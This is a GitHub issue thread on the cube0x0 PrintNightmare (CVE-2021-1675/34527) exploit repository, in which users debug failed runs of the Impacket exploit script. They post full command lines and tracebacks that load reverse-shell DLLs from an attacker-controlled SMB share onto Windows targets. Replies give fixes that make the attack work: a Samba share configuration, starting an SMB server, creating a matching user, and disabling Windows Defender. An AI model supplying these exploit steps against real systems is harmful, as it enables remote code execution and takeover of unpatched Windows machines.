cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist. #24

Open braieralves opened 3 years ago

braieralves commented 3 years ago

Hello.

I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Has anyone had the same problem or know how I can solve it please?

Complete stdout:

"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:Passwordblablbal@172.16.224.10 '\172.16.224.6\smb\fakeprinter.dll'
[*] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
  File "./CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "./CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."

User exists in the AD: "balves"

Target: WS 2019

Thanks

rewks commented 3 years ago

Did you copy the smb.conf in the README exactly? i.e. did you include this line: force user = smbuser

If so, remove that line or change smbuser to a valid username on your attacking machine.

braieralves commented 3 years ago

Thanks for your help, @rewks .

I tried all combinations of users:

Nothing works.

If I remove the line, another error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."

braieralves commented 3 years ago

Same error in any machine test =/

korang commented 3 years ago

Try force user = nobody

braieralves commented 3 years ago

Hello, @korang .

Thanks. But if I make any changes in "force user =", this new error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."

I don't have any more ideas of what it can be =(

braieralves commented 3 years ago

When I disable "Windows Defender", the script works =)

Thanks

wtechsec commented 3 years ago

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

@cube0x0

@braieralves you disabled "Windows Defender" on the server, was that it?

I have this same error!

I tried the options but with no success!

Any idea?

braieralves commented 3 years ago

Hello @wtechsec .

Disable Windows Defender: https://jv16powertools.com/how-to-disable-windows-defender-windows-10/

Then, I created an AD user called "smbuser" (as in the /etc/samba/smb.conf).

After this, the exploit worked

mrh3r000 commented 3 years ago

Hey @braieralves ,
I am having the same problem as you. Could you help me?

┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll'

[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

braieralves commented 3 years ago

Hey @mrh3r000

Review this item: \192.168.40.155>\smb\rev.dll - Correct form: \192.168.40.155\smb\rev.dll

mrh3r000 commented 3 years ago

I did it again from where and got the same error as the picture T_T. Could you help me?

braieralves commented 3 years ago

@mrh3r000 was your "file.dll" made correctly?

mrh3r000 commented 3 years ago

@braieralves Sure... :((

surfd4wg commented 3 years ago

Still having the problem....

┌──(root💀kali)-[/tmp/CVE-2021-1675]
└─# python3 CVE-2021-1675.py smbuser:smbuser@10.1.1.111 '\10.1.1.37\smb\reverse.dll'
[*] Connecting to ncacn_np:10.1.1.111[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.1.1.37\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
  File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Rao005 commented 2 years ago

Hey @braieralves , I am having the same problem as you. Could you help me?

┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll'

[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

Hi @mrh3r000, did you run smbserver? If not, get smbserver.py from GitHub and run it as follows: smbserver.py smb /tmp. P.S. /tmp is the path to your file.

T1erno commented 2 years ago

Well, I had the same problem and I solved it, but I don't know if it can help you. When the PoC is executed, the victim machine tries to look for a shared resource through SMB. Before, I tried with smbserver.py from impacket, but it didn't work. Instead, I activated the smb service with sudo systemctl start smb, which looks for the configuration file /etc/samba/smb.conf, sharing my /tmp/share folder. I created the malicious dll in /tmp/share. My /etc/samba/smb.conf file looks like this:


[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

braieralves commented 2 years ago

Hello everyone. I'm sorry for the delay in answering. Let me analyze your questions and see if I can help, ok?

I'll take a look next weekend, ok?

Regards.